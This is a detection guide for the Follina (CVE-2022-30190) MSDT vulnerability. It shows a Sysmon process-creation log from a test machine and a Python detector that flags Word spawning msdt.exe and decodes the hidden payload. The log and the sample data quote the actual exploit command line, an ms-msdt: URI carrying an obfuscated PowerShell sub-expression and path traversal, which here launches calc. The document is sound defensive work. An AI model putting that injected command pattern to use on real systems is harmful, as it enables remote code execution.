
Detecting the Follina (CVE-2022-30190) attack - KMO CDC

Published 5 August 2022

Already in May 2022, active exploitation was observed of a remote code execution vulnerability affecting the Microsoft Windows Support Diagnostic Tool (MSDT). The vulnerability is known as Follina and is tracked as CVE-2022-30190, with a CVSS base score of 7.8.

Follina abuses the Microsoft Office remote template feature to fetch an HTML file from an external URL; that HTML in turn invokes MSDT through the ms-msdt: URI protocol handler to execute code. To exploit it, the attacker crafts a Word document that carries the initial payload and delivers it to the target endpoint. No macros are required, and the RTF variant triggers from the Windows Explorer preview pane without the file being opened, so the parent process of msdt.exe is not always WINWORD.EXE.

Exploitation has been reported against Microsoft Office 2013 through 2019, Office 2021, Office 365 and Office ProPlus.

What is needed for the detection?

  • Sysmon must be installed on the agent, with a configuration that logs Event ID 1 (Process Create) including the command line and parent image.
  • A detection rule on the agent that matches the event below. The record is a Sysmon Event ID 1 as forwarded by the agent, captured on a test machine where testuser opened follina.doc; the fields to alert on are the parent WINWORD.EXE, the child msdt.exe, the ms-msdt: URI in the command line, the PowerShell sub-expression inside the IT_BrowseForFile parameter, and the long ../ chain ending in mpsigstub.exe:
{
   "win":{
      "system":{
         "providerName":"Microsoft-Windows-Sysmon",
         "providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
         "eventID":"1",
         "version":"5",
         "level":"4",
         "task":"1",
         "opcode":"0",
         "keywords":"0x8000000000000000",
         "systemTime":"2022-06-27T12:40:16.8110927Z",
         "eventRecordID":"46563",
         "processID":"8328",
         "threadID":"8172",
         "channel":"Microsoft-Windows-Sysmon/Operational",
         "computer":"DESKTOP-4E0BQFT",
         "severityValue":"INFORMATION",
         "message":"\"Process Create:\r\nRuleName: technique_id=T1027,technique_name=Obfuscated Files or Information\r\nUtcTime: 2022-06-27 12:40:16.788\r\nProcessGuid: {76e50f37-a530-62b9-f813-000000000300}\r\nProcessId: 4924\r\nImage: C:\\Windows\\SysWOW64\\msdt.exe\r\nFileVersion: 10.0.19041.1 (WinBuild.160101.0800)\r\nDescription: Diagnostics Troubleshooting Wizard\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: msdt.exe\r\nCommandLine: \"C:\\Windows\\system32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\"\r\nCurrentDirectory: C:\\Users\\testuser\\Documents\\\r\nUser: DESKTOP-4E0BQFT\\testuser\r\nLogonGuid: {76e50f37-2fc1-6244-7717-020000000000}\r\nLogonId: 0x21777\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: SHA1=25FA6252069395C5F923A22D40FCB0EC6D13A109,MD5=A9AB42610361BF6432259061737EA309,SHA256=48103C8EE52D4CEFF0FB8974FFB17E6BFAB773B51F9D187A3A581401D6A7663B,IMPHASH=19CB93A7F4980963BA180BBC8785967E\r\nParentProcessGuid: {76e50f37-a529-62b9-f613-000000000300}\r\nParentProcessId: 5024\r\nParentImage: C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE\r\nParentCommandLine: \"C:\\Program Files (x86)\\Microsoft Office\\Office15\\WINWORD.EXE\" /n \"C:\\Users\\testuser\\Documents\\follina.doc\" /o \"\"\r\nParentUser: DESKTOP-4E0BQFT\\testuser\""
      },
      "eventdata":{
         "ruleName":"technique_id=T1027,technique_name=Obfuscated Files or Information",
         "utcTime":"2022-06-27 12:40:16.788",
         "processGuid":"{76e50f37-a530-62b9-f813-000000000300}",
         "processId":"4924",
         "image":"C:\\\\Windows\\\\SysWOW64\\\\msdt.exe",
         "fileVersion":"10.0.19041.1 (WinBuild.160101.0800)",
         "description":"Diagnostics Troubleshooting Wizard",
         "product":"Microsoft® Windows® Operating System",
         "company":"Microsoft Corporation",
         "originalFileName":"msdt.exe",
         "commandLine":"\\\"C:\\\\Windows\\\\system32\\\\msdt.exe\\\" ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\"",
         "currentDirectory":"C:\\\\Users\\\\testuser\\\\Documents\\\\",
         "user":"DESKTOP-4E0BQFT\\\\testuser",
         "logonGuid":"{76e50f37-2fc1-6244-7717-020000000000}",
         "logonId":"0x21777",
         "terminalSessionId":"1",
         "integrityLevel":"Medium",
         "hashes":"SHA1=25FA6252069395C5F923A22D40FCB0EC6D13A109,MD5=A9AB42610361BF6432259061737EA309,SHA256=48103C8EE52D4CEFF0FB8974FFB17E6BFAB773B51F9D187A3A581401D6A7663B,IMPHASH=19CB93A7F4980963BA180BBC8785967E",
         "parentProcessGuid":"{76e50f37-a529-62b9-f613-000000000300}",
         "parentProcessId":"5024",
         "parentImage":"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Office15\\\\WINWORD.EXE",
         "parentCommandLine":"\\\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Office15\\\\WINWORD.EXE\\\" /n \\\"C:\\\\Users\\\\testuser\\\\Documents\\\\follina.doc\\\" /o \\\"\\\"",
         "parentUser":"DESKTOP-4E0BQFT\\\\testuser"
      }
   }
}
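The record above contains every field a detection needs. As an added example (it is not code from the original post and does not target any particular SIEM product), the Python script below runs that logic over two constructed agent records in the same JSON shape: one that mirrors the Follina record above and one benign msdt.exe launch from Explorer for contrast. The host name, user and the benign command line are assumed test data. The script flags msdt.exe spawned by an Office process, the ms-msdt: URI, a PowerShell $( ) sub-expression inside IT_BrowseForFile and the ../ traversal, and it decodes the base64 blob hidden in the parameter so the analyst sees what the attacker wanted to run.

```python
import base64
import binascii
import json
import re
from typing import Optional

# Office processes that should never legitimately spawn msdt.exe.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}

# Argument of FromBase64String(...), written either with plain quotes or with the
# [char]34 quote obfuscation used in the record above.
_B64_ARG = re.compile(
    r"FromBase64String\((?:'\+\[char\]34\+'|[\"'])([A-Za-z0-9+/]+={0,2})", re.IGNORECASE
)


def _basename(path: str) -> str:
    """Last path component, lower-cased; tolerates the doubled backslashes in the agent's JSON."""
    return re.split(r"[\\/]+", path)[-1].lower()


def decode_payload(command_line: str) -> Optional[str]:
    """Recover the base64 blob hidden in the IT_BrowseForFile parameter, if there is one."""
    m = _B64_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Return a finding when a Sysmon Event ID 1 record matches the Follina chain, else None."""
    win = event.get("win", {})
    system = win.get("system", {})
    if str(system.get("eventID")) != "1":  # only Process Create events
        return None
    data = win.get("eventdata", {})
    image = _basename(data.get("image", ""))
    parent = _basename(data.get("parentImage", ""))
    cmd = data.get("commandLine", "")
    cmd_lc = cmd.lower()

    signals = []
    if image == "msdt.exe" and parent in OFFICE_PARENTS:
        signals.append("office_spawned_msdt")
    if "ms-msdt:" in cmd_lc:  # the protocol handler Follina abuses
        signals.append("ms-msdt_uri")
    if "it_browseforfile=$(" in cmd_lc:  # PowerShell sub-expression injected into a parameter
        signals.append("powershell_subexpression_in_param")
    if "/../" in cmd or "\\..\\" in cmd:  # traversal towards mpsigstub.exe
        signals.append("path_traversal")
    if not signals:
        return None

    # Office parent plus the URI is the documented chain; the URI alone (e.g. the RTF
    # preview-pane variant, where explorer.exe is the parent) still deserves a look.
    severity = "high" if {"office_spawned_msdt", "ms-msdt_uri"} <= set(signals) else "medium"
    return {
        "severity": severity,
        "signals": signals,
        "host": system.get("computer"),
        "user": data.get("user"),
        "parent": parent,
        "payload": decode_payload(cmd),
    }


def scan(records_json: str) -> list:
    """Run analyze_event over a JSON array of agent records and keep only the findings."""
    return [f for f in (analyze_event(e) for e in json.loads(records_json)) if f]


# Constructed sample records (assumed test data) in the JSON shape the agent produces for
# Sysmon Event ID 1, trimmed to the fields the detector reads. The first mirrors the
# record above; the second is a benign msdt.exe launch from Explorer.
SAMPLE_EVENTS = r'''
[
 {"win":{"system":{"eventID":"1","computer":"DESKTOP-4E0BQFT"},
  "eventdata":{"image":"C:\\\\Windows\\\\SysWOW64\\\\msdt.exe",
   "commandLine":"\\\"C:\\\\Windows\\\\system32\\\\msdt.exe\\\" ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'Y2FsYw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\\"",
   "user":"DESKTOP-4E0BQFT\\\\testuser",
   "parentImage":"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Office15\\\\WINWORD.EXE"}}},
 {"win":{"system":{"eventID":"1","computer":"DESKTOP-4E0BQFT"},
  "eventdata":{"image":"C:\\\\Windows\\\\system32\\\\msdt.exe",
   "commandLine":"\\\"C:\\\\Windows\\\\system32\\\\msdt.exe\\\" -id NetworkDiagnosticsWeb",
   "user":"DESKTOP-4E0BQFT\\\\testuser",
   "parentImage":"C:\\\\Windows\\\\explorer.exe"}}}
]
'''

if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

Run as-is, the script reports one high-severity finding for the first record, with all four signals and the decoded payload "calc", and stays silent on the Explorer launch. Keying on WINWORD.EXE as parent alone would miss the RTF preview-pane variant, which is why the ms-msdt: URI on its own is still scored as medium.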

Author: christophe